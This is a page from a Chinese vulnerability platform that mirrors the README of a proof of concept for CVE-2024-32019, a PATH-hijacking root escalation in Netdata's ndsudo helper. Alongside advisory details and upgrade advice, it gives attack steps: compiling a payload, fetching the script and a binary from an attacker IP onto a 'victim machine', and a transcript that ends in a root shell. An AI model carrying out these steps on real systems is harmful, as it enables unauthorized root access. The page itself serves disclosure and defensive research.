漏洞平台

POC详情： 8ea0892dbbeb787439a79500b3263018289650dd

来源

https://github.com/T1erno/CVE-2024-32019-Netdata-ndsudo-Privilege-Escalation-PoC

关联漏洞

标题： Netdata 安全漏洞 (CVE-2024-32019)
描述：Netdata是Netdata开源的一个高保真基础设施监控和故障排除应用程序。 Netdata存在安全漏洞。攻击者利用该漏洞以 root 权限运行任意程序。

描述

Netdata ndsudo Privilege Escalation PoC

介绍

# CVE-2024-32019 Netdata ndsudo Privilege Escalation PoC

## Summary

CVE-2024-32019 is a local privilege-escalation flaw in Netdata’s SUID helper ndsudo that lets a local user execute arbitrary programs as root via an untrusted search path (PATH hijacking). 

The issue exists because ndsudo restricts command names but resolves them using the caller’s PATH, allowing a user to place a malicious binary earlier in PATH and have ndsudo run it with root privileges. 

It affects Netdata Agent versions ≥ v1.45.0 and < v1.45.3, and ≥ v1.44.0-60 and < v1.45.0-169, and carries a CVSS v3.1 score of 8.8 (High). 

Mitigation is to upgrade to v1.45.3 or v1.45.0-169; the weakness maps to CWE-426 (Untrusted Search Path). 

## Usage
1. Compile payload or craft your one
```
gcc -static payload.c -o nvme -Wall -Werror -Wpedantic
```

2. Upload script and payload to victim machine 
```
test@ubuntu:/tmp$ wget http://192.168.100.7:8000/CVE-2024-32019.sh
--2025-09-10 23:49:01--  http://192.168.100.7:8000/CVE-2024-32019.sh
Connecting to 192.168.100.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 712 [application/x-sh]
Saving to: ‘CVE-2024-32019.sh’

CVE-2024-32019.sh                                    100%[==================================================>]     712  --.-KB/s    in 0s

2025-09-10 23:49:01 (57.1 MB/s) - ‘CVE-2024-32019.sh’ saved [712/712]

test@ubuntu:/tmp$ wget http://192.168.100.7:8000/nvme
--2025-09-10 23:49:10--  http://192.168.100.7:8000/nvme
Connecting to 192.168.100.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 832552 (813K) [application/octet-stream]
Saving to: ‘nvme’

nvme                                                 100%[==================================================>] 813.04K  1.98MB/s    in 0.4s

2025-09-10 23:49:11 (1.98 MB/s) - ‘nvme’ saved [832552/832552]
```
3. Execute PoC
```
test@ubuntu:/tmp$ sh CVE-2024-32019.sh
[+] ndsudo found at: /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
[+] File 'nvme' found in the current directory.
[+] Execution permissions granted to ./nvme
[+] Running ndsudo with modified PATH:
root@ubuntu:/tmp#

```

#### Sources:
- https://www.rapid7.com/db/modules/exploit/linux/local/ndsudo_cve_2024_32019/
- https://www.wiz.io/vulnerability-database/cve/cve-2024-32019
- https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93

文件快照


 [4.0K]  /data/pocs/8ea0892dbbeb787439a79500b3263018289650dd
├── [ 712]  CVE-2024-32019.sh
├── [ 157]  payload.c
└── [2.3K]  README.md

0 directories, 3 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。